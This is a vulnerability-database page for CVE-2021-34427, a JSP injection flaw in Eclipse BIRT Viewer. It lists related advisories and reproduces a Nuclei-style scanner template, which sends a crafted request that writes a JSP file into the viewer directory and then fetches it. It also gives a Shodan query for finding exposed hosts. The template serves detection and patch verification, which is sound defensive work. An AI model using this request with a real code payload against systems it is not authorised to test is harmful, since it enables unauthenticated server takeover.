| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution Vulnerability | 24 Dec 202200:00 | – | zdt | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Eclipse Business_Intelligence_And_Reporting_Tools | 17 Jun 202623:48 | – | githubexploit | |
| CVE-2021-34427 | 25 Jun 202119:15 | – | attackerkb | |
| CVE-2021-34427 | 17 Nov 202519:45 | – | circl | |
| Eclipse BIRT 代码问题漏洞 | 25 Jun 202100:00 | – | cnnvd | |
| CVE-2021-34427 | 25 Jun 202100:00 | – | cve | |
| CVE-2021-34427 | 25 Jun 202100:00 | – | cvelist | |
| EUVD-2021-21085 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-34427 | 25 Jun 202119:15 | – | nvd | |
| Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution | 22 Dec 202200:00 | – | packetstorm |
id: CVE-2021-34427
info:
name: Eclipse BIRT Viewer - Remote Code Execution
author: us3r777,Synacktiv
severity: critical
description: |
Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.
impact: |
Unauthenticated attackers can create and access malicious JSP files via JSP injection, achieving remote code execution and complete server compromise.
remediation: |
Upgrade to Eclipse BIRT version 4.9.0 or later.
reference:
- https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142
- https://sec-consult.com/vulnerability-lab/advisory/remote-code-execution-bypass-eclipse-business-intelligence-reporting-birt/
- https://nvd.nist.gov/vuln/detail/CVE-2021-34427
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-34427
epss-score: 0.5771
epss-percentile: 0.98967
cwe-id: CWE-434
cpe: cpe:2.3:a:eclipse:business_intelligence_and_reporting_tools:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: vendor
product: business_intelligence_and_reporting_tools
shodan-query: 'http.title:"eclipse birt home"'
tags: cve,cve2021,birt,rce,file-upload,intrusive,vuln,vkev
variables:
filename: "{{rand_base(20)}}"
fingerprint: "{{rand_base(20)}}"
payload: "<%out.println(\"{{fingerprint}}\");%>"
flow: http(1) && http(2)
http:
- raw:
- |
GET /document?__report=test.rptdesign&sample={{url_encode(payload)}}&__document=./test/{{filename}}.jsp/. HTTP/1.1
Host: {{Hostname}}
- |
GET /test/{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body_1, "The report document file has been generated successfully.")'
- 'contains(body_2, "{{fingerprint}}")'
- 'contains(header_2, "text/html")'
condition: and
# digest: 4b0a00483046022100fbcd90c6c8e50bb9fe035537626ac643b823a8d2ff62e810434e2696a89e7b7d022100ca3896c450acc7b5a200ce37a446360445b6f336d4c8ad5ee8e56b8b46408495:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation